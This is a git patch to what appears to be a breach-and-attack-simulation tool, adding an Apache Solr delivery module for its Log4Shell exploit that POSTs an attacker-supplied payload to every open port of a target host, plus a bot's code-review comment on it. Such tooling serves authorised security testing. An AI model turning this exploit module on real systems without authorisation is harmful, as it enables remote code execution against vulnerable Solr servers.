From 563438c7f86cd2de908e79e6a4e7a3c44835d0a0 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 5 Jan 2022 12:37:08 +0100
Subject: [PATCH] Agent, Island: Add Apache Solr support for Log4Shell exploit
---
 .../log4shell_utils/requests/__init__.py | 3 ++-
 .../exploit/log4shell_utils/requests/solr.py | 25 +++++++++++++++++++
 .../cc/services/config_schema/internal.py | 2 +-
 3 files changed, 28 insertions(+), 2 deletions(-)
 create mode 100644 monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py b/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py
index e6a289d5c..08b7e3253 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py
@@ -1,3 +1,4 @@
 from .poc_docker import trigger_exploit as exploit_poc
+from .solr import trigger_exploit as exploit_solr
-exploits = [exploit_poc]
+exploits = [exploit_poc, exploit_solr]
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py b/monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py
new file mode 100644
index 000000000..ca5d31875
--- /dev/null
+++ b/monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py
@@ -0,0 +1,25 @@
+from logging import getLogger
+from typing import List
+
+import requests
+
+from infection_monkey.model import VictimHost
+
+logger = getLogger(__name__)
+
+
+def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
+ urls = build_urls(open_ports, host)
+ payload = {"foo": payload}
+ for url in urls:
+ try:
+ resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
+ except requests.ReadTimeout as e:
+ logger.debug(f"Log4shell request failed {e}")
+
+
+def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
+ urls = []
+ for port in open_ports:
+ urls.append(f"http://{host.ip_addr}:{port}/solr/admin/cores")
+ return urls
diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py
index 84baa6ca5..dff4e8a13 100644
--- a/monkey/monkey_island/cc/services/config_schema/internal.py
+++ b/monkey/monkey_island/cc/services/config_schema/internal.py
@@ -129,7 +129,7 @@ INTERNAL = {
 "type": "array",
 "uniqueItems": True,
 "items": {"type": "integer"},
- "default": [80, 8080, 443, 8008, 7001, 9200],
+ "default": [80, 8080, 443, 8008, 7001, 9200, 8983],
 "description": "List of ports the monkey will check if are being used "
 "for HTTP",
 },
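Review bot: In `trigger_exploit` (new file solr.py) the `except requests.ReadTimeout` clause is narrower than what `requests.post` can raise, so a refused connection or a connect timeout on one port propagates out of the loop and out of the function; `except requests.RequestException as e:` would keep the failure local and logged. The message "Log4shell request failed" is also written for a read timeout, which may be an ordinary outcome here, so it would be more useful if it named the URL and the exception type. `verify=False` has no effect on the `http://` URLs that `build_urls` produces, so it and the `# noqa DUO123` suppression can be dropped, and `resp` is assigned but never read. Neither function has a docstring; a one-line summary on `trigger_exploit` such as `"""POST the payload to /solr/admin/cores on every open port of host."""` would record the network side effect for callers.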